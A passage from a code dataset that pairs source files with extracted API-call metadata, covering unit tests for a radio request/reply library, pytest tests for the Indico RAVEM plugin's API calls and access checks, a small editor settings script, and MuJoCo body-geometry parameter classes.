foo_handler, soft=True)\n\n @init_radio\n def test_trigger_fail_on_incorrect_arguments(self):\n '''\n \"request\" fails when arguments for handler is incorrect.\n '''\n\n def foo_handler(required_arg): pass\n self.radio.reply('foo', foo_handler)\n\n with self.assertRaises(TypeError):\n self.radio.request('foo')\n\n\nsuite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)\n"},"apis":{"kind":"list like","value":["radio.Radio","unittest.TestLoader"],"string":"[\n \"radio.Radio\",\n \"unittest.TestLoader\"\n]"},"extract_api":{"kind":"string","value":"[((248, 255), 'radio.Radio', 'Radio', ([], {}), '()\\n', (253, 255), False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\\n'), ((3016, 3028), 'unittest.TestLoader', 'TestLoader', ([], {}), '()\\n', (3026, 3028), False, 'from unittest import TestCase, TestLoader\\n')]"}}},{"rowIdx":729,"cells":{"code":{"kind":"string","value":"import os\nimport sys\n\nDIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )\n\n\ndef Settings( **kwargs ):\n return {\n 'interpreter_path': sys.executable,\n 'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ]\n }\n"},"apis":{"kind":"list like","value":["os.path.dirname","os.path.join"],"string":"[\n \"os.path.dirname\",\n \"os.path.join\"\n]"},"extract_api":{"kind":"string","value":"[((60, 85), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\\n', (75, 85), False, 'import os\\n'), ((187, 234), 'os.path.join', 'os.path.join', (['DIR_OF_THIS_SCRIPT', '\"\"\"third_party\"\"\"'], {}), \"(DIR_OF_THIS_SCRIPT, 'third_party')\\n\", (199, 234), False, 'import os\\n')]"}}},{"rowIdx":730,"cells":{"code":{"kind":"string","value":"# This file is part of the CERN Indico plugins.\n# Copyright (C) 2014 - 2022 CERN\n#\n# The CERN Indico plugins are free software; you can redistribute\n# them and/or modify them under the terms of the MIT License; see\n# the LICENSE file for more details.\n\nfrom unittest.mock import MagicMock\n\nimport pytest\nfrom requests.exceptions import HTTPError, Timeout\n\nfrom indico.testing.util import extract_logs\n\nfrom indico_ravem.plugin import RavemPlugin\nfrom indico_ravem.util import has_access, ravem_api_call\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize('method', ('get', 'post'))\ndef test_correct_http_method(mocker, method):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert request.call_args[0][0] == method\n\n\n@pytest.mark.usefixtures('db')\ndef test_correct_auth_method(mocker):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n token = 'foo'\n RavemPlugin.settings.set('access_token', token)\n ravem_api_call('test_endpoint', param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert 'Authorization' in request.call_args[1]['headers']\n assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token\n\n\n@pytest.mark.usefixtures('db')\ndef test_accepts_json(mocker):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = 
{'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n ravem_api_call('test_endpoint', param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert request.call_args[1]['headers']['Accept'] == 'application/json'\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), (\n ('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'),\n ('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'),\n ('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),\n ('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'),\n ('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'),\n ('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),\n ('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),\n ('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),\n ('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),\n ('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),\n ('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),\n ('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),\n ('https://ravem.test/', '', 'https://ravem.test/'),\n ('https://ravem.test/api/', '', 'https://ravem.test/api/'),\n ('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'),\n))\ndef test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n RavemPlugin.settings.set('api_endpoint', root_endpoint)\n ravem_api_call(endpoint, param1='test1', param2='test2')\n\n assert request.call_count == 1\n assert request.call_args[0][1] == expected_url\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize('params', (\n {},\n {'p1': '1stparam'},\n {'p1': '1stparam', 'p2': '2ndparam'}\n))\ndef test_params_generated(mocker, params):\n request = mocker.patch('indico_ravem.util.requests.request')\n response = MagicMock()\n response.json.return_value = {'result': 'test'}\n response.raise_for_status.return_value = False\n request.return_value = response\n\n ravem_api_call('test_endpoint', params=params)\n\n assert request.call_count == 1\n assert request.call_args[1]['params'] == params\n\n\n@pytest.mark.usefixtures('db')\ndef test_raises_timeout(mocker):\n request = mocker.patch('indico_ravem.util.requests.request')\n request.side_effect = Timeout('Timeout test error message', request=request)\n\n with pytest.raises(Timeout) as excinfo:\n ravem_api_call('test_endpoint')\n\n assert str(excinfo.value) == \"Timeout while contacting the room.\"\n assert request.call_count == 1\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize(('method', 'params'), (\n ('get', {}),\n ('post', {}),\n ('get', {'p1': '1stparam'}),\n ('post', {'p1': '1stparam'}),\n ('get', {'p1': '1stparam', 'p2': '2ndparam'}),\n ('post', {'p1': '1stparam', 'p2': '2ndparam'})\n))\ndef test_unexpected_exception_is_logged(mocker, caplog, method, params):\n request = 
mocker.patch('indico_ravem.util.requests.request')\n request.side_effect = IndexError('this is unexpected')\n\n with pytest.raises(IndexError) as excinfo:\n ravem_api_call('test_endpoint', method=method, **params)\n\n assert str(excinfo.value) == 'this is unexpected'\n log = extract_logs(caplog, one=True, name='indico.plugin.ravem')\n assert log.message == \"failed call: {} {} with {}: {}\".format(method.upper(), 'test_endpoint', params,\n 'this is unexpected')\n assert request.call_count == 1\n\n\n@pytest.mark.usefixtures('db')\n@pytest.mark.parametrize(('method', 'params'), (\n ('get', {}),\n ('post', {}),\n ('get', {'p1': '1stparam'}),\n ('post', {'p1': '1stparam'}),\n ('get', {'p1': '1stparam', 'p2': '2ndparam'}),\n ('post', {'p1': '1stparam', 'p2': '2ndparam'})\n))\ndef test_http_error_is_logged(mocker, caplog, method, params):\n request = mocker.patch('indico_ravem.util.requests.request')\n request.method = method.upper()\n request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint'\n response = MagicMock()\n response.raise_for_status.side_effect = HTTPError('Well this is embarrassing')\n response.request = request\n response.url = response.request.url\n request.return_value = response\n\n with pytest.raises(HTTPError) as excinfo:\n ravem_api_call('test_endpoint', method=method, **params)\n\n assert str(excinfo.value) == 'Well this is embarrassing'\n log = extract_logs(caplog, one=True, name='indico.plugin.ravem')\n assert log.message == '{} {} failed with {}'.format(\n method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing')\n\n assert request.call_count == 1\n\n\n@pytest.mark.usefixtures('db')\ndef test_unlinked_event_vc_room_has_no_access():\n event_vc_room = MagicMock()\n event_vc_room.link_object = None\n\n assert not has_access(event_vc_room)\n\n\n@pytest.mark.usefixtures('db', 'request_context')\ndef test_unlinked_room_has_no_access(mocker):\n session = mocker.patch('indico_ravem.util.session')\n session.user = ''\n\n event_vc_room = MagicMock()\n event_vc_room.link_object.room = None\n\n assert not has_access(event_vc_room)\n\n\n@pytest.mark.usefixtures('db', 'request_context')\ndef test_check_if_current_user_is_room_owner(mocker):\n session = mocker.patch('indico_ravem.util.session')\n session.user = ''\n request = mocker.patch('indico_ravem.util.request')\n request.remote_addr = '192.168.127.12'\n retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal')\n retrieve_principal.side_effect = lambda x: session.user\n\n event_vc_room = MagicMock()\n event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)\n event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr\n event_vc_room.vc_room.data.get.return_value = 'User:123'\n event_vc_room.event.can_manage.return_value = False\n\n assert has_access(event_vc_room)\n\n\n@pytest.mark.usefixtures('db', 'request_context')\ndef test_check_if_current_user_can_modify(mocker):\n request = mocker.patch('indico_ravem.util.request')\n request.remote_addr = '192.168.127.12'\n session = mocker.patch('indico_ravem.util.session')\n session.user = ''\n mocker.patch('indico_ravem.util._retrieve_principal')\n\n event_vc_room = MagicMock()\n event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)\n event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr\n event_vc_room.event.can_manage.return_value = True\n\n assert has_access(event_vc_room)\n 
event_vc_room.event.can_manage.assert_called_once_with(session.user)\n"},"apis":{"kind":"list like","value":["unittest.mock.MagicMock","indico.testing.util.extract_logs","indico_ravem.plugin.RavemPlugin.settings.get","indico_ravem.util.has_access","pytest.mark.parametrize","pytest.raises","pytest.mark.usefixtures","requests.exceptions.HTTPError","indico_ravem.plugin.RavemPlugin.settings.set","indico_ravem.util.ravem_api_call","requests.exceptions.Timeout"],"string":"[\n \"unittest.mock.MagicMock\",\n \"indico.testing.util.extract_logs\",\n \"indico_ravem.plugin.RavemPlugin.settings.get\",\n \"indico_ravem.util.has_access\",\n \"pytest.mark.parametrize\",\n \"pytest.raises\",\n \"pytest.mark.usefixtures\",\n \"requests.exceptions.HTTPError\",\n \"indico_ravem.plugin.RavemPlugin.settings.set\",\n \"indico_ravem.util.ravem_api_call\",\n \"requests.exceptions.Timeout\"\n]"},"extract_api":{"kind":"string","value":"[((506, 535), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (529, 535), False, 'import pytest\\n'), ((537, 587), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['\"\"\"method\"\"\"', \"('get', 'post')\"], {}), \"('method', ('get', 'post'))\\n\", (560, 587), False, 'import pytest\\n'), ((1033, 1062), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (1056, 1062), False, 'import pytest\\n'), ((1655, 1684), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (1678, 1684), False, 'import pytest\\n'), ((2130, 2159), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (2153, 2159), False, 'import pytest\\n'), ((2161, 3611), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ([\"('root_endpoint', 'endpoint', 'expected_url')\", \"(('https://ravem.test/', 'final_endpoint',\\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'final_endpoint',\\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\\n 'https://ravem.test/api/', './final_endpoint',\\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\\n 'https://ravem.test', 'sub/final_endpoint',\\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\\n 'https://ravem.test/api/', './sub/final_endpoint',\\n 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\\n 'https://ravem.test/api/v2/'))\"], {}), \"(('root_endpoint', 'endpoint', 'expected_url'), ((\\n 'https://ravem.test/', 'final_endpoint',\\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'final_endpoint',\\n 'https://ravem.test/api/v2/final_endpoint'), 
('https://ravem.test',\\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\\n 'https://ravem.test/api/', './final_endpoint',\\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\\n 'https://ravem.test', 'sub/final_endpoint',\\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\\n 'https://ravem.test/api/', './sub/final_endpoint',\\n 'https://ravem.test/api/sub/final_endpoint'), (\\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\\n 'https://ravem.test/api/v2/')))\\n\", (2184, 3611), False, 'import pytest\\n'), ((4101, 4130), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (4124, 4130), False, 'import pytest\\n'), ((4132, 4233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['\"\"\"params\"\"\"', \"({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})\"], {}), \"('params', ({}, {'p1': '1stparam'}, {'p1':\\n '1stparam', 'p2': '2ndparam'}))\\n\", (4155, 4233), False, 'import pytest\\n'), ((4661, 4690), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (4684, 4690), False, 'import pytest\\n'), ((5064, 5093), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (5087, 5093), False, 'import pytest\\n'), ((5095, 5336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ([\"('method', 'params')\", \"(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\\n 'p1': '1stparam', 'p2': '2ndparam'}))\"], {}), \"(('method', 'params'), (('get', {}), ('post', {}), (\\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\\n '2ndparam'})))\\n\", (5118, 5336), False, 'import pytest\\n'), ((6017, 6046), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (6040, 6046), False, 'import pytest\\n'), ((6048, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ([\"('method', 'params')\", \"(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\\n 'p1': '1stparam', 'p2': '2ndparam'}))\"], {}), \"(('method', 'params'), (('get', {}), ('post', {}), (\\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\\n '2ndparam'})))\\n\", (6071, 6289), False, 'import pytest\\n'), ((7213, 7242), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"'], {}), \"('db')\\n\", (7236, 7242), False, 'import pytest\\n'), ((7406, 7454), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"', '\"\"\"request_context\"\"\"'], {}), \"('db', 'request_context')\\n\", (7429, 7454), False, 'import pytest\\n'), ((7705, 7753), 'pytest.mark.usefixtures', 
'pytest.mark.usefixtures', (['\"\"\"db\"\"\"', '\"\"\"request_context\"\"\"'], {}), \"('db', 'request_context')\\n\", (7728, 7753), False, 'import pytest\\n'), ((8491, 8539), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['\"\"\"db\"\"\"', '\"\"\"request_context\"\"\"'], {}), \"('db', 'request_context')\\n\", (8514, 8539), False, 'import pytest\\n'), ((714, 725), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (723, 725), False, 'from unittest.mock import MagicMock\\n'), ((870, 948), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'method': 'method', 'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"('test_endpoint', method=method, param1='test1', param2='test2')\\n\", (884, 948), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((1181, 1192), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (1190, 1192), False, 'from unittest.mock import MagicMock\\n'), ((1355, 1402), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['\"\"\"access_token\"\"\"', 'token'], {}), \"('access_token', token)\\n\", (1379, 1402), False, 'from indico_ravem.plugin import RavemPlugin\\n'), ((1407, 1470), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"('test_endpoint', param1='test1', param2='test2')\\n\", (1421, 1470), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((1796, 1807), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (1805, 1807), False, 'from unittest.mock import MagicMock\\n'), ((1952, 2015), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"('test_endpoint', param1='test1', param2='test2')\\n\", (1966, 2015), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((3738, 3749), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (3747, 3749), False, 'from unittest.mock import MagicMock\\n'), ((3894, 3949), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['\"\"\"api_endpoint\"\"\"', 'root_endpoint'], {}), \"('api_endpoint', root_endpoint)\\n\", (3918, 3949), False, 'from indico_ravem.plugin import RavemPlugin\\n'), ((3954, 4010), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['endpoint'], {'param1': '\"\"\"test1\"\"\"', 'param2': '\"\"\"test2\"\"\"'}), \"(endpoint, param1='test1', param2='test2')\\n\", (3968, 4010), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((4367, 4378), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (4376, 4378), False, 'from unittest.mock import MagicMock\\n'), ((4523, 4569), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'params': 'params'}), \"('test_endpoint', params=params)\\n\", (4537, 4569), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((4815, 4869), 'requests.exceptions.Timeout', 'Timeout', (['\"\"\"Timeout test error message\"\"\"'], {'request': 'request'}), \"('Timeout test error message', request=request)\\n\", (4822, 4869), False, 'from requests.exceptions import HTTPError, Timeout\\n'), ((5725, 5783), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '\"\"\"indico.plugin.ravem\"\"\"'}), \"(caplog, one=True, name='indico.plugin.ravem')\\n\", (5737, 5783), False, 'from indico.testing.util import 
extract_logs\\n'), ((6559, 6570), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (6568, 6570), False, 'from unittest.mock import MagicMock\\n'), ((6615, 6653), 'requests.exceptions.HTTPError', 'HTTPError', (['\"\"\"Well this is embarrassing\"\"\"'], {}), \"('Well this is embarrassing')\\n\", (6624, 6653), False, 'from requests.exceptions import HTTPError, Timeout\\n'), ((6945, 7003), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '\"\"\"indico.plugin.ravem\"\"\"'}), \"(caplog, one=True, name='indico.plugin.ravem')\\n\", (6957, 7003), False, 'from indico.testing.util import extract_logs\\n'), ((7312, 7323), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (7321, 7323), False, 'from unittest.mock import MagicMock\\n'), ((7606, 7617), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (7615, 7617), False, 'from unittest.mock import MagicMock\\n'), ((8151, 8162), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (8160, 8162), False, 'from unittest.mock import MagicMock\\n'), ((8214, 8242), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\\n', (8223, 8242), False, 'from unittest.mock import MagicMock\\n'), ((8462, 8487), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\\n', (8472, 8487), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((8853, 8864), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\\n', (8862, 8864), False, 'from unittest.mock import MagicMock\\n'), ((8916, 8944), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\\n', (8925, 8944), False, 'from unittest.mock import MagicMock\\n'), ((9102, 9127), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\\n', (9112, 9127), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((4880, 4902), 'pytest.raises', 'pytest.raises', (['Timeout'], {}), '(Timeout)\\n', (4893, 4902), False, 'import pytest\\n'), ((4923, 4954), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {}), \"('test_endpoint')\\n\", (4937, 4954), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((5557, 5582), 'pytest.raises', 'pytest.raises', (['IndexError'], {}), '(IndexError)\\n', (5570, 5582), False, 'import pytest\\n'), ((5603, 5659), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'method': 'method'}), \"('test_endpoint', method=method, **params)\\n\", (5617, 5659), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((6485, 6525), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['\"\"\"api_endpoint\"\"\"'], {}), \"('api_endpoint')\\n\", (6509, 6525), False, 'from indico_ravem.plugin import RavemPlugin\\n'), ((6771, 6795), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\\n', (6784, 6795), False, 'import pytest\\n'), ((6816, 6872), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['\"\"\"test_endpoint\"\"\"'], {'method': 'method'}), \"('test_endpoint', method=method, **params)\\n\", (6830, 6872), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((7377, 7402), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\\n', (7387, 7402), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((7676, 7701), 'indico_ravem.util.has_access', 'has_access', 
(['event_vc_room'], {}), '(event_vc_room)\\n', (7686, 7701), False, 'from indico_ravem.util import has_access, ravem_api_call\\n'), ((7085, 7125), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['\"\"\"api_endpoint\"\"\"'], {}), \"('api_endpoint')\\n\", (7109, 7125), False, 'from indico_ravem.plugin import RavemPlugin\\n')]"}}},{"rowIdx":731,"cells":{"code":{"kind":"string","value":"import numpy as np\nimport xml.etree.ElementTree as ET\n\nclass Geom(object):\n def __init__(self, geom):\n self.xml = geom\n self.params = []\n\n def get_params(self):\n return self.params.copy()\n\n def set_params(self, new_params):\n self.params = new_params\n\n def update_point(self, p, new_params):\n pass\n\n def update_xml(self):\n pass\n\n def update(self, new_params):\n self.set_params(new_params)\n self.update_xml()\n\n def get_smallest_z(self):\n pass\n\n def get_param_limits(self):\n pass\n\n def get_param_names(self):\n pass\n\n def get_volume(self):\n pass\n\nclass Sphere(Geom):\n min_radius = .05\n max_radius = .4\n\n def __init__(self, geom):\n self.xml = geom\n self.params = [float(self.xml.get('size'))] # radius\n self.center = np.array([float(x) for x in self.xml.get('pos').split()])\n\n def update_point(self, p, new_params):\n return ((p - self.center) * new_params[0] / self.params[0]) + self.center\n\n def update_xml(self):\n self.xml.set('size', str(self.params[0]))\n\n def get_smallest_z(self):\n return self.center[2] - self.params[0]\n\n def get_param_limits(self):\n return [[self.min_radius], [self.max_radius]]\n\n def get_param_names(self):\n return ['radius']\n\n def get_volume(self):\n return 4./3. * np.pi * self.params[0] ** 3\n\nclass Capsule(Geom):\n min_length = 0.175\n max_length = 0.8\n min_radius = 0.035\n max_radius = 0.085\n\n def __init__(self, geom):\n self.xml = geom\n fromto = [float(x) for x in self.xml.get('fromto').split()]\n self.p1 = np.array(fromto[:3])\n self.p2 = np.array(fromto[3:])\n length = np.sqrt(np.sum((self.p2 - self.p1) ** 2))\n radius = float(self.xml.get('size'))\n self.params = [length, radius]\n self.axis = (self.p2 - self.p1) / length\n\n def update_point(self, p, new_params):\n lfac = p.dot(self.axis) * self.axis\n rfac = p - lfac\n return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1])\n\n def update_xml(self):\n self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])]))\n self.xml.set('size', str(self.params[1])) # radius\n\n def set_params(self, new_params):\n p1 = self.update_point(self.p1, new_params)\n p2 = self.update_point(self.p2, new_params)\n # update only after computing p1, p2\n self.p1 = p1\n self.p2 = p2\n super().set_params(new_params)\n\n def get_smallest_z(self):\n return min(self.p1[2], self.p2[2]) - self.params[1]\n\n def get_param_limits(self):\n return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]]\n\n def get_param_names(self):\n return ['length','radius']\n\n def get_volume(self):\n return 4./3. 
* np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2\n\nclass Body:\n geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types\n\n def __init__(self, body, worldbody=False):\n self.xml = body\n self.worldbody = worldbody\n\n geom_xml = body.find('geom') # assume only one geometry per body\n self.geom = self.geoms[geom_xml.get('type')](geom_xml)\n self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')]\n self.parts = [Body(b) for b in body.findall('body')]\n pos = [b.get('pos') for b in body.findall('body')]\n self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos]\n pos = [j.get('pos') for j in self.joints]\n self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos]\n self.n = len(self.geom.get_params())\n self.n_all_params = len(self.get_params())\n\n self.zmin = float(self.xml.get(\"pos\").split()[2]) - self.get_height()\n\n def get_height(self):\n max_height = -self.geom.get_smallest_z()\n for body, pos in zip(self.parts, self.part_positions):\n max_height = max(max_height, body.get_height() - pos[2])\n return max_height\n\n def update_initial_position(self):\n pos = self.xml.get(\"pos\").split()\n pos[2] = str(self.get_height() + self.zmin)\n self.xml.set(\"pos\", ' '.join(pos))\n\n def update_xml(self):\n for body, pos in zip(self.parts, self.part_positions):\n body.xml.set('pos', ' '.join([str(x) for x in pos]))\n\n for joint, pos in zip(self.joints, self.joint_positions):\n joint.set('pos', ' '.join([str(x) for x in pos]))\n\n def set_body_positions(self, new_params):\n for i, pos in enumerate(self.part_positions):\n self.part_positions[i] = self.geom.update_point(pos, new_params)\n for i, pos in enumerate(self.joint_positions):\n self.joint_positions[i] = self.geom.update_point(pos, new_params)\n\n def update(self, new_params):\n self.set_body_positions(new_params)\n self.geom.update(new_params)\n self.update_xml()\n\n def get_params(self):\n params = self.geom.get_params()\n for body in self.parts:\n params += body.get_params()\n return params\n\n def get_param_limits(self):\n limits = self.geom.get_param_limits()\n for body in self.parts:\n body_limits = body.get_param_limits()\n limits[0] += body_limits[0]\n limits[1] += body_limits[1]\n return limits\n\n def get_param_names(self):\n name = self.xml.get('name')\n param_names = [name + '-' + p for p in self.geom.get_param_names()]\n for body in self.parts:\n param_names += 